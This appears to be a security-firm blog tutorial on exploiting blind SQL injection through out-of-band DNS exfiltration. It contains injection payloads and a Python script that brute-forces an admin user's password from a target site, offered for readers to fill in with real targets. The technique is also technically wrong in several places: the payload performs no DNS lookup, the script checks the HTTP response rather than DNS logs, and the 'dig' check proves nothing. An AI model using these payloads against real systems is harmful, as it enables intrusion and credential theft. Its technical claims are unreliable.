Blog | G5 Cyber Security

OOB DNS Injection Guide

G5 Cyber Security

TL;DR

This guide shows how to exploit Blind SQL Injection vulnerabilities using Out-of-Band (OOB) DNS requests for data exfiltration. We’ll use a simple Python script and common tools like dig or nslookup to detect the responses.

What is OOB DNS Exfiltration?

Blind SQL Injection means you can send queries to a database, but don’t see the results directly in the web application. OOB (Out-of-Band) techniques let us get data back indirectly. In this case, we make the database server perform a DNS lookup with a name that includes our stolen data. We then monitor for those DNS requests on our own server.

Prerequisites

Step-by-Step Guide

  1. Set up a DNS Listener
    • You need a way to see DNS requests. You can use tools like tcpdump, or set up a simple DNS server on your machine (not covered here). For simplicity, we’ll assume you have access to DNS logs for your domain.
    • Ensure your firewall allows incoming DNS queries on port 53.
  2. Craft the Payload

    The core idea is to inject SQL code that causes a DNS lookup when executed by the database server.

    SELECT CASE WHEN (1=1) THEN 'yourdomain.com' ELSE '' END;

    This simple example will cause a DNS request for yourdomain.com if the condition (1=1) is true. We’ll expand this to include data.

  3. Injecting into the Vulnerable Parameter

    Identify a parameter in the web application that’s vulnerable to SQL Injection. This usually involves trying different inputs and looking for errors or unexpected behaviour.

    Modify your request to include the payload. For example, if the vulnerable parameter is called id:

    http://example.com/page?id=1 UNION SELECT CASE WHEN (1=1) THEN 'yourdomain.com' ELSE '' END; -- -

    The UNION SELECT part allows us to add our query alongside the original one. The comment -- - is used to remove any trailing parts of the original query that might cause errors.

  4. Exfiltrating Data (Character by Character)

    We’ll extract data character-by-character using a loop and the SUBSTRING() function. This is slow, but reliable.

    SELECT CASE WHEN SUBSTRING((SELECT password FROM users WHERE username = 'admin'), 1, 1) = 'a' THEN 'yourdomain.com' ELSE '' END;

    This query checks if the first character of the admin user’s password is ‘a’. If it is, a DNS request for yourdomain.com will be made.

  5. Automating with Python

    Writing a script to automate this process is crucial. Here’s a basic example:

    import requests
import time

url = 'http://example.com/page?id='
target_domain = 'yourdomain.com'
password_length = 10 # Example length

for i in range(1, password_length + 1):
    for char in 'abcdefghijklmnopqrstuvwxyz0123456789':
        payload = f"1 UNION SELECT CASE WHEN SUBSTRING((SELECT password FROM users WHERE username = 'admin'), {i}, 1) = '{char}' THEN '{target_domain}' ELSE '' END; -- -"
        full_url = url + payload
        try:
            response = requests.get(full_url)
            # Check DNS logs for target_domain.  This is the critical step.
            if target_domain in response.text: #Simple check, improve this!
                print(f"Character {i}: {char}")
                break
        except Exception as e:
            print(f"Error: {e}")
        time.sleep(1)  # Be polite to the server

    Important: Replace http://example.com/page?id=, yourdomain.com and password length with your actual values.

  6. Monitoring DNS Logs

    Continuously monitor your DNS logs for requests to yourdomain.com. Each request indicates a successful character match in the SQL query. The characters will be revealed sequentially as you run the script.

    You can use tools like dig or nslookup to manually check if a DNS request was made:

    dig yourdomain.com

Important Considerations

Exit mobile version